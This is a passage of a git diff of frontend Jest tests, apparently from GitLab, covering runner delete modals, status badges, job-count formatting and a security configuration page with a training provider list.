expect(findRunnerDeleteModal().attributes('modal-id')).toBe(modalId); + }); + + it('Delete modal shows the runner name', () => { + expect(findRunnerDeleteModal().props('runnerName')).toBe( + `#${getIdFromGraphQLId(mockRunner.id)} (${mockRunner.shortSha})`, + ); + }); + it('The delete button does not have a loading icon', () => { + expect(findDeleteBtn().props('loading')).toBe(false); + expect(getTooltip(findDeleteBtn())).toBe('Delete runner'); + }); + + it('When delete mutation is called, current runners are refetched', () => { + jest.spyOn(wrapper.vm.$apollo, 'mutate'); + + findRunnerDeleteModal().vm.$emit('primary'); + + expect(wrapper.vm.$apollo.mutate).toHaveBeenCalledWith({ + mutation: runnerDeleteMutation, + variables: { + input: { + id: mockRunner.id, + }, + }, + awaitRefetchQueries: true, + refetchQueries: [getRunnersQueryName, getGroupRunnersQueryName], }); + }); - it('The user sees a confirmation alert', () => { - expect(window.confirm).toHaveBeenCalledTimes(1); + describe('When delete is clicked', () => { + beforeEach(() => { + findRunnerDeleteModal().vm.$emit('primary'); }); - it('The delete mutation is not called', () => { - expect(runnerDeleteMutationHandler).toHaveBeenCalledTimes(0); + it('The delete mutation is called correctly', () => { + expect(runnerDeleteMutationHandler).toHaveBeenCalledTimes(1); + expect(runnerDeleteMutationHandler).toHaveBeenCalledWith({ + input: { id: mockRunner.id }, + }); }); - it('The delete button does not have a loading state', () => { - expect(findDeleteBtn().props('loading')).toBe(false); - expect(findDeleteBtn().attributes('title')).toBe('Remove'); + it('The delete button has a loading icon', () => { + expect(findDeleteBtn().props('loading')).toBe(true); + expect(getTooltip(findDeleteBtn())).toBe(''); + }); + + it('The toast notification is shown', () => { + expect(mockToastShow).toHaveBeenCalledTimes(1); + expect(mockToastShow).toHaveBeenCalledWith( + expect.stringContaining(`#${getIdFromGraphQLId(mockRunner.id)} (${mockRunner.shortSha})`), + ); + }); + }); + + describe('When delete fails', () => { + describe('On a network error', () => { + const mockErrorMsg = 'Delete error!'; + + beforeEach(() => { + runnerDeleteMutationHandler.mockRejectedValueOnce(new Error(mockErrorMsg)); + + findRunnerDeleteModal().vm.$emit('primary'); + }); + + it('error is reported to sentry', () => { + expect(captureException).toHaveBeenCalledWith({ + error: new Error(`Network error: ${mockErrorMsg}`), + component: 'RunnerActionsCell', + }); + }); + + it('error is shown to the user', () => { + expect(createFlash).toHaveBeenCalledTimes(1); + }); + + it('toast notification is not shown', () => { + expect(mockToastShow).not.toHaveBeenCalled(); + }); + }); + + describe('On a validation error', () => { + const mockErrorMsg = 'Runner not found!'; + const mockErrorMsg2 = 'User not allowed!'; + + beforeEach(() => { + runnerDeleteMutationHandler.mockResolvedValue({ + data: { + runnerDelete: { + errors: [mockErrorMsg, mockErrorMsg2], + }, + }, + }); + + findRunnerDeleteModal().vm.$emit('primary'); + }); + + it('error is reported to sentry', () => { + expect(captureException).toHaveBeenCalledWith({ + error: new Error(`${mockErrorMsg} ${mockErrorMsg2}`), + component: 'RunnerActionsCell', + }); + }); + + it('error is shown to the user', () => { + expect(createFlash).toHaveBeenCalledTimes(1); + }); }); }); }); diff --git a/spec/frontend/runner/components/runner_contacted_state_badge_spec.js b/spec/frontend/runner/components/runner_contacted_state_badge_spec.js deleted file mode 100644 index 57a27f39826..00000000000 --- a/spec/frontend/runner/components/runner_contacted_state_badge_spec.js +++ /dev/null @@ -1,86 +0,0 @@ -import { GlBadge } from '@gitlab/ui'; -import { shallowMount } from '@vue/test-utils'; -import RunnerContactedStateBadge from '~/runner/components/runner_contacted_state_badge.vue'; -import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; -import { STATUS_ONLINE, STATUS_OFFLINE, STATUS_NOT_CONNECTED } from '~/runner/constants'; - -describe('RunnerTypeBadge', () => { - let wrapper; - - const findBadge = () => wrapper.findComponent(GlBadge); - const getTooltip = () => getBinding(findBadge().element, 'gl-tooltip'); - - const createComponent = ({ runner = {} } = {}) => { - wrapper = shallowMount(RunnerContactedStateBadge, { - propsData: { - runner: { - contactedAt: '2021-01-01T00:00:00Z', - status: STATUS_ONLINE, - ...runner, - }, - }, - directives: { - GlTooltip: createMockDirective(), - }, - }); - }; - - beforeEach(() => { - jest.useFakeTimers('modern'); - }); - - afterEach(() => { - jest.useFakeTimers('legacy'); - - wrapper.destroy(); - }); - - it('renders online state', () => { - jest.setSystemTime(new Date('2021-01-01T00:01:00Z')); - - createComponent(); - - expect(wrapper.text()).toBe('online'); - expect(findBadge().props('variant')).toBe('success'); - expect(getTooltip().value).toBe('Runner is online; last contact was 1 minute ago'); - }); - - it('renders offline state', () => { - jest.setSystemTime(new Date('2021-01-02T00:00:00Z')); - - createComponent({ - runner: { - status: STATUS_OFFLINE, - }, - }); - - expect(wrapper.text()).toBe('offline'); - expect(findBadge().props('variant')).toBe('muted'); - expect(getTooltip().value).toBe( - 'No recent contact from this runner; last contact was 1 day ago', - ); - }); - - it('renders not connected state', () => { - createComponent({ - runner: { - contactedAt: null, - status: STATUS_NOT_CONNECTED, - }, - }); - - expect(wrapper.text()).toBe('not connected'); - expect(findBadge().props('variant')).toBe('muted'); - expect(getTooltip().value).toMatch('This runner has never connected'); - }); - - it('does not fail when data is missing', () => { - createComponent({ - runner: { - status: null, - }, - }); - - expect(wrapper.text()).toBe(''); - }); -}); diff --git a/spec/frontend/runner/components/runner_delete_modal_spec.js b/spec/frontend/runner/components/runner_delete_modal_spec.js new file mode 100644 index 00000000000..3e5b634d815 --- /dev/null +++ b/spec/frontend/runner/components/runner_delete_modal_spec.js @@ -0,0 +1,60 @@ +import { GlModal } from '@gitlab/ui'; +import { mount, shallowMount } from '@vue/test-utils'; +import RunnerDeleteModal from '~/runner/components/runner_delete_modal.vue'; + +describe('RunnerDeleteModal', () => { + let wrapper; + + const findGlModal = () => wrapper.findComponent(GlModal); + + const createComponent = ({ props = {} } = {}, mountFn = shallowMount) => { + wrapper = mountFn(RunnerDeleteModal, { + attachTo: document.body, + propsData: { + runnerName: '#99 (AABBCCDD)', + ...props, + }, + attrs: { + modalId: 'delete-runner-modal-99', + }, + }); + }; + + it('Displays title', () => { + createComponent(); + + expect(findGlModal().props('title')).toBe('Delete runner #99 (AABBCCDD)?'); + }); + + it('Displays buttons', () => { + createComponent(); + + expect(findGlModal().props('actionPrimary')).toMatchObject({ text: 'Delete runner' }); + expect(findGlModal().props('actionCancel')).toMatchObject({ text: 'Cancel' }); + }); + + it('Displays contents', () => { + createComponent(); + + expect(findGlModal().html()).toContain( + 'The runner will be permanently deleted and no longer available for projects or groups in the instance. Are you sure you want to continue?', + ); + }); + + describe('When modal is confirmed by the user', () => { + let hideModalSpy; + + beforeEach(() => { + createComponent({}, mount); + hideModalSpy = jest.spyOn(wrapper.vm.$refs.modal, 'hide').mockImplementation(() => {}); + }); + + it('Modal gets hidden', () => { + expect(hideModalSpy).toHaveBeenCalledTimes(0); + + findGlModal().vm.$emit('primary'); + + expect(hideModalSpy).toHaveBeenCalledTimes(1); + }); + }); +}); diff --git a/spec/frontend/runner/components/runner_filtered_search_bar_spec.js b/spec/frontend/runner/components/runner_filtered_search_bar_spec.js index 9ea0955f2a1..5ab0db019a3 100644 --- a/spec/frontend/runner/components/runner_filtered_search_bar_spec.js +++ b/spec/frontend/runner/components/runner_filtered_search_bar_spec.js @@ -15,7 +15,6 @@ describe('RunnerList', () => { const findFilteredSearch = () => wrapper.findComponent(FilteredSearch); const findGlFilteredSearch = () => wrapper.findComponent(GlFilteredSearch); const findSortOptions = () => wrapper.findAllComponents(GlDropdownItem); - const findActiveRunnersMessage = () => wrapper.findByTestId('runner-count'); const mockDefaultSort = 'CREATED_DESC'; const mockOtherSort = 'CONTACTED_DESC'; @@ -23,7 +22,6 @@ describe('RunnerList', () => { { type: PARAM_KEY_STATUS, value: { data: STATUS_ACTIVE, operator: '=' } }, { type: 'filtered-search-term', value: { data: '' } }, ]; - const mockActiveRunnersCount = 2; const expectToHaveLastEmittedInput = (value) => { const inputs = wrapper.emitted('input'); @@ -43,9 +41,6 @@ describe('RunnerList', () => { }, ...props, }, - slots: { - 'runner-count': `Runners currently online: ${mockActiveRunnersCount}`, - }, stubs: { FilteredSearch, GlFilteredSearch, @@ -69,12 +64,6 @@ describe('RunnerList', () => { expect(findFilteredSearch().props('namespace')).toBe('runners'); }); - it('Displays an active runner count', () => { - expect(findActiveRunnersMessage().text()).toBe( - `Runners currently online: ${mockActiveRunnersCount}`, - ); - }); - it('sets sorting options', () => { const SORT_OPTIONS_COUNT = 2; diff --git a/spec/frontend/runner/components/runner_list_spec.js b/spec/frontend/runner/components/runner_list_spec.js index 986e55a2132..5a14fa5a2d5 100644 --- a/spec/frontend/runner/components/runner_list_spec.js +++ b/spec/frontend/runner/components/runner_list_spec.js @@ -46,12 +46,19 @@ describe('RunnerList', () => { 'Runner ID', 'Version', 'IP Address', + 'Jobs', 'Tags', 'Last contact', '', // actions has no label ]); }); + it('Sets runner id as a row key', () => { + createComponent({}, shallowMount); + + expect(findTable().attributes('primary-key')).toBe('id'); + }); + it('Displays a list of runners', () => { expect(findRows()).toHaveLength(4); @@ -73,6 +80,7 @@ describe('RunnerList', () => { // Other fields expect(findCell({ fieldKey: 'version' }).text()).toBe(version); expect(findCell({ fieldKey: 'ipAddress' }).text()).toBe(ipAddress); + expect(findCell({ fieldKey: 'jobCount' }).text()).toBe('0'); expect(findCell({ fieldKey: 'tagList' }).text()).toBe(''); expect(findCell({ fieldKey: 'contactedAt' }).text()).toEqual(expect.any(String)); @@ -83,6 +91,42 @@ describe('RunnerList', () => { expect(actions.findByTestId('toggle-active-runner').exists()).toBe(true); }); + describe('Table data formatting', () => { + let mockRunnersCopy; + + beforeEach(() => { + mockRunnersCopy = [ + { + ...mockRunners[0], + }, + ]; + }); + + it('Formats job counts', () => { + mockRunnersCopy[0].jobCount = 1; + + createComponent({ props: { runners: mockRunnersCopy } }, mount); + + expect(findCell({ fieldKey: 'jobCount' }).text()).toBe('1'); + }); + + it('Formats large job counts', () => { + mockRunnersCopy[0].jobCount = 1000; + + createComponent({ props: { runners: mockRunnersCopy } }, mount); + + expect(findCell({ fieldKey: 'jobCount' }).text()).toBe('1,000'); + }); + + it('Formats large job counts with a plus symbol', () => { + mockRunnersCopy[0].jobCount = 1001; + + createComponent({ props: { runners: mockRunnersCopy } }, mount); + + expect(findCell({ fieldKey: 'jobCount' }).text()).toBe('1,000+'); + }); + }); + it('Shows runner identifier', () => { const { id, shortSha } = mockRunners[0]; const numericId = getIdFromGraphQLId(id); diff --git a/spec/frontend/runner/components/runner_status_badge_spec.js b/spec/frontend/runner/components/runner_status_badge_spec.js new file mode 100644 index 00000000000..a19515d6ed2 --- /dev/null +++ b/spec/frontend/runner/components/runner_status_badge_spec.js @@ -0,0 +1,130 @@ +import { GlBadge } from '@gitlab/ui'; +import { shallowMount } from '@vue/test-utils'; +import RunnerStatusBadge from '~/runner/components/runner_status_badge.vue'; +import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; +import { + STATUS_ONLINE, + STATUS_OFFLINE, + STATUS_STALE, + STATUS_NOT_CONNECTED, + STATUS_NEVER_CONTACTED, +} from '~/runner/constants'; + +describe('RunnerTypeBadge', () => { + let wrapper; + + const findBadge = () => wrapper.findComponent(GlBadge); + const getTooltip = () => getBinding(findBadge().element, 'gl-tooltip'); + + const createComponent = (props = {}) => { + wrapper = shallowMount(RunnerStatusBadge, { + propsData: { + runner: { + contactedAt: '2020-12-31T23:59:00Z', + status: STATUS_ONLINE, + }, + ...props, + }, + directives: { + GlTooltip: createMockDirective(), + }, + }); + }; + + beforeEach(() => { + jest.useFakeTimers('modern'); + jest.setSystemTime(new Date('2021-01-01T00:00:00Z')); + }); + + afterEach(() => { + jest.useFakeTimers('legacy'); + + wrapper.destroy(); + }); + + it('renders online state', () => { + createComponent(); + + expect(wrapper.text()).toBe('online'); + expect(findBadge().props('variant')).toBe('success'); + expect(getTooltip().value).toBe('Runner is online; last contact was 1 minute ago'); + }); + + it('renders not connected state', () => { + createComponent({ + runner: { + contactedAt: null, + status: STATUS_NOT_CONNECTED, + }, + }); + + expect(wrapper.text()).toBe('not connected'); + expect(findBadge().props('variant')).toBe('muted'); + expect(getTooltip().value).toMatch('This runner has never connected'); + }); + + it('renders never contacted state as not connected, for backwards compatibility', () => { + createComponent({ + runner: { + contactedAt: null, + status: STATUS_NEVER_CONTACTED, + }, + }); + + expect(wrapper.text()).toBe('not connected'); + expect(findBadge().props('variant')).toBe('muted'); + expect(getTooltip().value).toMatch('This runner has never connected'); + }); + + it('renders offline state', () => { + createComponent({ + runner: { + contactedAt: '2020-12-31T00:00:00Z', + status: STATUS_OFFLINE, + }, + }); + + expect(wrapper.text()).toBe('offline'); + expect(findBadge().props('variant')).toBe('muted'); + expect(getTooltip().value).toBe( + 'No recent contact from this runner; last contact was 1 day ago', + ); + }); + + it('renders stale state', () => { + createComponent({ + runner: { + contactedAt: '2020-01-01T00:00:00Z', + status: STATUS_STALE, + }, + }); + + expect(wrapper.text()).toBe('stale'); + expect(findBadge().props('variant')).toBe('warning'); + expect(getTooltip().value).toBe('No contact from this runner in over 3 months'); + }); + + describe('does not fail when data is missing', () => { + it('contacted_at is missing', () => { + createComponent({ + runner: { + contactedAt: null, + status: STATUS_ONLINE, + }, + }); + + expect(wrapper.text()).toBe('online'); + expect(getTooltip().value).toBe('Runner is online; last contact was n/a'); + }); + + it('status is missing', () => { + createComponent({ + runner: { + status: null, + }, + }); + + expect(wrapper.text()).toBe(''); + }); + }); +}); diff --git a/spec/frontend/runner/components/search_tokens/tag_token_spec.js b/spec/frontend/runner/components/search_tokens/tag_token_spec.js index 52b87542243..89c06ba2df4 100644 --- a/spec/frontend/runner/components/search_tokens/tag_token_spec.js +++ b/spec/frontend/runner/components/search_tokens/tag_token_spec.js @@ -41,7 +41,7 @@ const mockTagTokenConfig = { title: 'Tags', type: 'tag', token: TagToken, - recentTokenValuesStorageKey: mockStorageKey, + recentSuggestionsStorageKey: mockStorageKey, operators: OPERATOR_IS_ONLY, }; diff --git a/spec/frontend/runner/components/stat/runner_online_stat_spec.js b/spec/frontend/runner/components/stat/runner_online_stat_spec.js new file mode 100644 index 00000000000..18f865aa22c --- /dev/null +++ b/spec/frontend/runner/components/stat/runner_online_stat_spec.js @@ -0,0 +1,34 @@ +import { GlSingleStat } from '@gitlab/ui/dist/charts'; +import { shallowMount, mount } from '@vue/test-utils'; +import RunnerOnlineBadge from '~/runner/components/stat/runner_online_stat.vue'; + +describe('RunnerOnlineBadge', () => { + let wrapper; + + const findSingleStat = () => wrapper.findComponent(GlSingleStat); + + const createComponent = ({ props = {} } = {}, mountFn = shallowMount) => { + wrapper = mountFn(RunnerOnlineBadge, { + propsData: { + value: '99', + ...props, + }, + }); + }; + + afterEach(() => { + wrapper.destroy(); + }); + + it('Uses a success appearance', () => { + createComponent({}, shallowMount); + + expect(findSingleStat().props('variant')).toBe('success'); + }); + + it('Renders a value', () => { + createComponent({}, mount); + + expect(wrapper.text()).toMatch(new RegExp(`Online Runners 99\\s+online`)); + }); +}); diff --git a/spec/frontend/runner/group_runners/group_runners_app_spec.js b/spec/frontend/runner/group_runners/group_runners_app_spec.js index 39bca743c80..4451100de19 100644 --- a/spec/frontend/runner/group_runners/group_runners_app_spec.js +++ b/spec/frontend/runner/group_runners/group_runners_app_spec.js @@ -130,24 +130,24 @@ describe('GroupRunnersApp', () => { }); describe('shows the active runner count', () => { + const expectedOnlineCount = (count) => new RegExp(`Online Runners ${count}`); + it('with a regular value', () => { createComponent({ mountFn: mount }); - expect(findRunnerFilteredSearchBar().text()).toMatch( - `Runners in this group: ${mockGroupRunnersLimitedCount}`, - ); + expect(wrapper.text()).toMatch(expectedOnlineCount(mockGroupRunnersLimitedCount)); }); it('at the limit', () => { createComponent({ props: { groupRunnersLimitedCount: 1000 }, mountFn: mount }); - expect(findRunnerFilteredSearchBar().text()).toMatch(`Runners in this group: 1,000`); + expect(wrapper.text()).toMatch(expectedOnlineCount('1,000')); }); it('over the limit', () => { createComponent({ props: { groupRunnersLimitedCount: 1001 }, mountFn: mount }); - expect(findRunnerFilteredSearchBar().text()).toMatch(`Runners in this group: 1,000+`); + expect(wrapper.text()).toMatch(expectedOnlineCount('1,000\\+')); }); }); diff --git a/spec/frontend/security_configuration/components/app_spec.js b/spec/frontend/security_configuration/components/app_spec.js index d4ee9e6e43d..0a2b18caf25 100644 --- a/spec/frontend/security_configuration/components/app_spec.js +++ b/spec/frontend/security_configuration/components/app_spec.js @@ -20,6 +20,7 @@ import { AUTO_DEVOPS_ENABLED_ALERT_DISMISSED_STORAGE_KEY, } from '~/security_configuration/components/constants'; import FeatureCard from '~/security_configuration/components/feature_card.vue'; +import TrainingProviderList from '~/security_configuration/components/training_provider_list.vue'; import UpgradeBanner from '~/security_configuration/components/upgrade_banner.vue'; import { @@ -39,7 +40,11 @@ describe('App component', () => { let wrapper; let userCalloutDismissSpy; - const createComponent = ({ shouldShowCallout = true, ...propsData }) => { + const createComponent = ({ + shouldShowCallout = true, + secureVulnerabilityTraining = true, + ...propsData + }) => { userCalloutDismissSpy = jest.fn(); wrapper = extendedWrapper( @@ -50,6 +55,9 @@ describe('App component', () => { autoDevopsHelpPagePath, autoDevopsPath, projectPath, + glFeatures: { + secureVulnerabilityTraining, + }, }, stubs: { ...stubChildren(SecurityConfigurationApp), @@ -71,6 +79,7 @@ describe('App component', () => { const findTabs = () => wrapper.findAllComponents(GlTab); const findByTestId = (id) => wrapper.findByTestId(id); const findFeatureCards = () => wrapper.findAllComponents(FeatureCard); + const findTrainingProviderList = () => wrapper.findComponent(TrainingProviderList); const findManageViaMRErrorAlert = () => wrapper.findByTestId('manage-via-mr-error-alert'); const findLink = ({ href, text, container = wrapper }) => { const selector = `a[href="${href}"]`; @@ -138,20 +147,20 @@ describe('App component', () => { expect(mainHeading.text()).toContain('Security Configuration'); }); - it('renders GlTab Component ', () => { - expect(findTab().exists()).toBe(true); - }); + describe('tabs', () => { + const expectedTabs = ['security-testing', 'compliance-testing', 'vulnerability-management']; - it('renders right amount of tabs with correct title ', () => { - expect(findTabs()).toHaveLength(2); - }); + it('renders GlTab Component', () => { + expect(findTab().exists()).toBe(true); + }); - it('renders security-testing tab', () => { - expect(findByTestId('security-testing-tab').exists()).toBe(true); - }); + it('renders correct amount of tabs', () => { + expect(findTabs()).toHaveLength(expectedTabs.length); + }); - it('renders compliance-testing tab', () => { - expect(findByTestId('compliance-testing-tab').exists()).toBe(true); + it.each(expectedTabs)('renders the %s tab', (tabName) => { + expect(findByTestId(`${tabName}-tab`).exists()).toBe(true); + }); }); it('renders right amount of feature cards for given props with correct props', () => { @@ -173,6 +182,10 @@ describe('App component', () => { expect(findComplianceViewHistoryLink().exists()).toBe(false); expect(findSecurityViewHistoryLink().exists()).toBe(false); }); + + it('renders TrainingProviderList component', () => { + expect(findTrainingProviderList().exists()).toBe(true); + }); }); describe('Manage via MR Error Alert', () => { @@ -418,4 +431,22 @@ describe('App component', () => { expect(findSecurityViewHistoryLink().attributes('href')).toBe('test/historyPath'); }); }); + + describe('when secureVulnerabilityTraining feature flag is disabled', () => { + beforeEach(() => { + createComponent({ + augmentedSecurityFeatures: securityFeaturesMock, + augmentedComplianceFeatures: complianceFeaturesMock, + secureVulnerabilityTraining: false, + }); + }); + + it('renders correct amount of tabs', () => { + expect(findTabs()).toHaveLength(2); + }); + + it('does not render the vulnerability-management tab', () => { + expect(wrapper.findByTestId('vulnerability-management-tab').exists()).toBe(false); + }); + }); }); diff --git a/spec/frontend/security_configuration/components/training_provider_list_spec.js b/spec/frontend/security_configuration/components/training_provider_list_spec.js new file mode 100644 index 00000000000..60cc36a634c --- /dev/null +++ b/spec/frontend/security_configuration/components/training_provider_list_spec.js @@ -0,0 +1,88 @@ +import { GlLink, GlToggle, GlCard, GlSkeletonLoader } from '@gitlab/ui'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; +import VueApollo from 'vue-apollo'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import TrainingProviderList from '~/security_configuration/components/training_provider_list.vue'; +import waitForPromises from 'helpers/wait_for_promises'; +import { securityTrainingProviders, mockResolvers } from '../mock_data'; + +Vue.use(VueApollo); + +describe('TrainingProviderList component', () => { + let wrapper; + let mockApollo; + let mockSecurityTrainingProvidersData; + + const createComponent = () => { + mockApollo = createMockApollo([], mockResolvers); + + wrapper = shallowMount(TrainingProviderList, { + apolloProvider: mockApollo, + }); + }; + + const waitForQueryToBeLoaded = () => waitForPromises(); + + const findCards = () => wrapper.findAllComponents(GlCard); + const findLinks = () => wrapper.findAllComponents(GlLink); + const findToggles = () => wrapper.findAllComponents(GlToggle); + const findLoader = () => wrapper.findComponent(GlSkeletonLoader); + + beforeEach(() => { + mockSecurityTrainingProvidersData = jest.fn(); + mockSecurityTrainingProvidersData.mockResolvedValue(securityTrainingProviders); + + createComponent(); + }); + + afterEach(() => { + wrapper.destroy(); + mockApollo = null; + }); + + describe('when loading', () => { + it('shows the loader', () => { + expect(findLoader().exists()).toBe(true); + }); + + it('does not show the cards', () => { + expect(findCards().exists()).toBe(false); + }); + }); + + describe('basic structure', () => { + beforeEach(async () => { + await waitForQueryToBeLoaded(); + }); + + it('renders correct amount of cards', () => { + expect(findCards()).toHaveLength(securityTrainingProviders.length); + }); + + securityTrainingProviders.forEach(({ name, description, url, isEnabled }, index) => { + it(`shows the name for card ${index}`, () => { + expect(findCards().at(index).text()).toContain(name); + }); + + it(`shows the description for card ${index}`, () => { + expect(findCards().at(index).text()).toContain(description); + }); + + it(`shows the learn more link for card ${index}`, () => { + expect(findLinks().at(index).attributes()).toEqual({ + target: '_blank', + href: url, + }); + }); + + it(`shows the toggle with the correct value for card ${index}`, () => { + expect(findToggles().at(index).props('value')).toEqual(isEnabled); + }); + + it('does not show loader when query is populated', () => { + expect(findLoader().exists()).toBe(false); + }); + }); + }); +}); diff --git a/spec/frontend/security_configuration/mock_data.js b/spec/frontend/security_configuration/mock_data.js new file mode 100644 index 00000000000..cdb859c3800 --- /dev/null +++ b/spec/frontend/security_configuration/mock_data.js @@ -0,0 +1,30 @@ +export const securityTrainingProviders = [ + { + id: 101, + name: 'Kontra', + description: 'Interactive developer security education.', + url: 'https://application.security/', + isEnabled: false, + }, + { + id: 102, + name: 'SecureCodeWarrior', + description: 'Security training with guide and learning pathways.', + url: 'https://www.securecodewarrior.com/', + isEnabled: true, + }, +]; + +export const securityTrainingProvidersResponse = { + data: { + securityTrainingProviders, + }, +}; + +export const mockResolvers = { + Query: { + securityTrainingProviders() { + return securityTrainingProviders; + }, + }, +}; diff --git a/spec/frontend/security_configuration/utils_spec.js b/spec/frontend/security_configuration/utils_spec.js index eaed4532baa..241e69204d2 100644 --- a/spec/frontend/security_configuration/utils_spec.js +++ b/spec/frontend/security_configuration/utils_spec.js @@ -1,101 +1,120 @@ -import { augmentFeatures } from '~/security_configuration/utils'; - -const mockSecurityFeatures = [ - { - name: 'SAST', - type: 'SAST', - }, -]; - -const mockComplianceFeatures = [ - { - name: 'LICENSE_COMPLIANCE', - type: 'LICENSE_COMPLIANCE', - }, -]; - -const mockFeaturesWithSecondary = [ - { - name: 'DAST', - type: 'DAST', - secondary: { - type: 'DAST PROFILES', - name: 'DAST PROFILES', +import { augmentFeatures, translateScannerNames } from '~/security_configuration/utils'; +import { SCANNER_NAMES_MAP } from '~/security_configuration/components/constants'; + +describe('augmentFeatures', () => { + const mockSecurityFeatures = [ + { + name: 'SAST', + type: 'SAST', }, - }, -]; - -const mockInvalidCustomFeature = [ - { - foo: 'bar', - }, -]; - -const mockValidCustomFeature = [ - { - name: 'SAST', - type: 'SAST', - customField: 'customvalue', - }, -]; - -const mockValidCustomFeatureSnakeCase = [ - { - name: 'SAST', - type: 'SAST', - custom_field: 'customvalue', - }, -]; - -const expectedOutputDefault = { - augmentedSecurityFeatures: mockSecurityFeatures, - augmentedComplianceFeatures: mockComplianceFeatures, -}; - -const expectedOutputSecondary = { - augmentedSecurityFeatures: mockSecurityFeatures, - augmentedComplianceFeatures: mockFeaturesWithSecondary, -}; - -const expectedOutputCustomFeature = { - augmentedSecurityFeatures: mockValidCustomFeature, - augmentedComplianceFeatures: mockComplianceFeatures, -}; - -describe('returns an object with augmentedSecurityFeatures and augmentedComplianceFeatures when', () => { - it('given an empty array', () => { - expect(augmentFeatures(mockSecurityFeatures, mockComplianceFeatures, [])).toEqual( - expectedOutputDefault, - ); + ]; + + const mockComplianceFeatures = [ + { + name: 'LICENSE_COMPLIANCE', + type: 'LICENSE_COMPLIANCE', + }, + ]; + + const mockFeaturesWithSecondary = [ + { + name: 'DAST', + type: 'DAST', + secondary: { + type: 'DAST PROFILES', + name: 'DAST PROFILES', + }, + }, + ]; + + const mockInvalidCustomFeature = [ + { + foo: 'bar', + }, + ]; + + const mockValidCustomFeature = [ + { + name: 'SAST', + type: 'SAST', + customField: 'customvalue', + }, + ]; + + const mockValidCustomFeatureSnakeCase = [ + { + name: 'SAST', + type: 'SAST', + custom_field: 'customvalue', + }, + ]; + + const expectedOutputDefault = { + augmentedSecurityFeatures: mockSecurityFeatures, + augmentedComplianceFeatures: mockComplianceFeatures, + }; + + const expectedOutputSecondary = { + augmentedSecurityFeatures: mockSecurityFeatures, + augmentedComplianceFeatures: mockFeaturesWithSecondary, + }; + + const expectedOutputCustomFeature = { + augmentedSecurityFeatures: mockValidCustomFeature, + augmentedComplianceFeatures: mockComplianceFeatures, + }; + + describe('returns an object with augmentedSecurityFeatures and augmentedComplianceFeatures when', () => { + it('given an empty array', () => { + expect(augmentFeatures(mockSecurityFeatures, mockComplianceFeatures, [])).toEqual( + expectedOutputDefault, + ); + }); + + it('given an invalid populated array', () => { + expect( + augmentFeatures(mockSecurityFeatures, mockComplianceFeatures, mockInvalidCustomFeature), + ).toEqual(expectedOutputDefault); + }); + + it('features have secondary key', () => { + expect(augmentFeatures(mockSecurityFeatures, mockFeaturesWithSecondary, [])).toEqual( + expectedOutputSecondary, + ); + }); + + it('given a valid populated array', () => { + expect( + augmentFeatures(mockSecurityFeatures, mockComplianceFeatures, mockValidCustomFeature), + ).toEqual(expectedOutputCustomFeature); + }); }); - it('given an invalid populated array', () => { - expect( - augmentFeatures(mockSecurityFeatures, mockComplianceFeatures, mockInvalidCustomFeature), - ).toEqual(expectedOutputDefault); + describe('returns an object with camelcased keys', () => { + it('given a customfeature in snakecase', () => { + expect( + augmentFeatures( + mockSecurityFeatures, + mockComplianceFeatures, + mockValidCustomFeatureSnakeCase, + ), + ).toEqual(expectedOutputCustomFeature); + }); }); +}); - it('features have secondary key', () => { - expect(augmentFeatures(mockSecurityFeatures, mockFeaturesWithSecondary, [])).toEqual( - expectedOutputSecondary, - ); +describe('translateScannerNames', () => { + it.each(['', undefined, null, 1, 'UNKNOWN_SCANNER_KEY'])('returns %p as is', (key) => { + expect(translateScannerNames([key])).toEqual([key]); }); - it('given a valid populated array', () => { - expect( - augmentFeatures(mockSecurityFeatures, mockComplianceFeatures, mockValidCustomFeature), - ).toEqual(expectedOutputCustomFeature); + it('returns an empty array if no input is provided', () => { + expect(translateScannerNames([])).toEqual([]); }); -}); -describe('returns an object with camelcased keys', () => { - it('given a customfeature in snakecase', () => { - expect( - augmentFeatures( - mockSecurityFeatures, - mockComplianceFeatures, - mockValidCustomFeatureSnakeCase, - ), - ).toEqual(expectedOutputCustomFeature); + it('returns translated scanner names', () => { + expect(translateScannerNames(Object.keys(SCANNER_NAMES_MAP))).toEqual( + Object.values(SCANNER_NAMES_MAP), + ); }); }); diff --git a/spec/frontend/self_monitor/components/__snapshots__/self_monitor_form_spec.js.snap b/spec/frontend/self_monitor/components/__snapshots__/self_monitor_form_spec.js.snap index 1a874c3dcd6..c968c28c811 100644 --- a/spec/frontend/self_monitor/components/__snapshots__/self_monitor_form_spec.js.snap +++ b/spec/frontend/self_monitor/components/__snapshots__/self_monitor_form_spec.js.snap @@ -52,6 +52,7 @@ exports[`self monitor component When the self monitor project has not been creat <gl-form-group-stub labeldescription="" + optionaltext="(optional)" > <gl-toggle-stub label="Self monitoring" diff --git a/spec/frontend/serverless/components/__snapshots__/empty_state_spec.js.snap b/spec/frontend/serverless/components/__snapshots__/empty_state_spec.js.snap index 53bef449c2f..c25a8d4bb92 100644 --- a/spec/frontend/serverless/components/__snapshots__/empty_state_spec.js.snap +++ b/spec/frontend/serverless/components/__snapshots__/empty_state_spec.js.snap @@ -7,8 +7,10 @@ exports[`EmptyStateComponent should render content 1`] = ` </div> <div class=\\"col-12\\"> <div class=\\"text-content gl-mx-auto gl-my-0 gl-p-5\\"> - <h1 class=\\"h4\\">Getting started with serverless</h1> - <p>In order to start using functions as a service, you must first install Knative on your Kubernetes cluster. <gl-link-stub href=\\"/help\\">More information</gl-link-stub> + <h1 class=\\"gl-font-size-h-display gl-line-height-36 h4\\"> + Getting started with serverless + </h1> + <p class=\\"gl-mt-3\\">In order to start using functions as a service, you must first install Knative on your Kubernetes cluster. <gl-link-stub href=\\"/help\\">More information</gl-link-stub> </p> <div class=\\"gl-display-flex gl-flex-wrap gl-justify-content-center\\"> <!----> diff --git a/spec/frontend/set_status_modal/set_status_modal_wrapper_spec.js b/spec/frontend/set_status_modal/set_status_modal_wrapper_spec.js index 3ff6d1f9597..d7261784edc 100644 --- a/spec/frontend/set_status_modal/set_status_modal_wrapper_spec.js +++ b/spec/frontend/set_status_modal/set_status_modal_wrapper_spec.js @@ -1,6 +1,6 @@ import { GlModal, GlFormCheckbox } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; -import { initEmojiMock } from 'helpers/emoji'; +import { initEmojiMock, clearEmojiMock } from 'helpers/emoji'; import * as UserApi from '~/api/user_api'; import EmojiPicker from '~/emoji/components/picker.vue'; import 